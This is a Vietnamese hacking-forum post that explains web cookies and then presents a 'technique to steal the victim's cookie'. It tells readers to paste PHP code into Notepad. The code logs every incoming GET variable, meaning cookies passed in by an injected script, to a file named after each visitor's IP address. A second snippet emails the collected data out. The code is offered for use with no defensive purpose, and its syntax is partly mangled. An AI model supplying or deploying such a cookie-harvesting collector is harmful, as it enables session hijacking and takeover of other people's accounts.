_ Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site vàbrowser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạngtext (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biếtcác thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trongsite.
Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sởthích, thói quen...Cookie được browser của người dùng chấp nhận lưu trên đĩacứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cậpvào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lầntruy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie(như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phảilàm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ralà có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chínhxác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúpcho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site.

_ Cookies thường có các thành phần sau :

+ Tên: do người lập trình web site chọn
+ Domain: là tên miền từ server mà cookie được tạo và gửi đi
+ Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
+ Ngày hết hạn: là thời điểm mà cookie hết hiệu lực .
+ Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơcmã hoá trong quá trình truyền giữa server và browser.
+ Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhậndạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giớihạn trong khoảng 4k.

( Tài liệu của Viethacker.net )

21 . ) Kỹ thuật lấy cắp cookie của nạn nhân :

_ Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó :

CODE
define (``LINE``, ``\r\n``);
define (``HTML_LINE``, ``
``);
function getvars($arr, $title)
{
$res = ````;
$len = count($arr);
if ($len > 0)
{
if (strlen($title) > 0)
{
print(``[--------$title--------]`` . HTML_LINE);
$res .= ``[--------$title--------]`` . LINE;
}
foreach ($arr as $key = > $value)
{
print(``[$key]`` . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= ``[$key]`` . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date(``Y-m-d H:i:s``);
// init
$myData = ``[-----$now-----]`` . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, ````);
// file
$file = $REMOTE_ADDR . ``.txt``;
$mode = ``r+``;
if (!file_exists($file))
$mode = ``w+``;
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
? >


hoặc

CODE
if ($contents && $header){
mail(``victim@yahoo.com`` , ``from mail script``,$contents,$header) or
die(`couldnt email it`);
sleep(2);
? >
Xem lý lịch thành viên http://www.thuanphongvlog.com

Thích

Báo xấu [0]

Gửi một bình luận lên tường nhà Quang Trung
Trả lời chủ đề này

Về Đầu TrangThông điệp [Trang 1 trong tổng số 1 trang]

Đây là những kiến thức tổng quát nhất về hacker EmptyĐây là những kiến thức tổng quát nhất về hacker Empty

« Xem bài trước | Xem bài kế tiếp »

Bài viết liên quan

  Quyền hạn của bạn:

  Bạn không có quyền trả lời bài viết  • Create a forum on Forumotion | ©phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất
  • Skin SVNH Rip by dothinh Phát triển bởi BQT và tất cả thành viên.
   Chúng tôi không chịu trách nhiệm về các bài viết do thành viên đưa lên.
   Vui lòng ghi rõ nguồn gốc bài viết khi phát hành lại thông tin từ diễn đàn này.

   © FM - Mods by Zzbaivong

   Copyright © wWw.BếnXưa.Vn 2010 - 2020 | Diễn đàn bắt đầu : 16/07/2010 | Liên hệ / Phone 0973210690. | QC :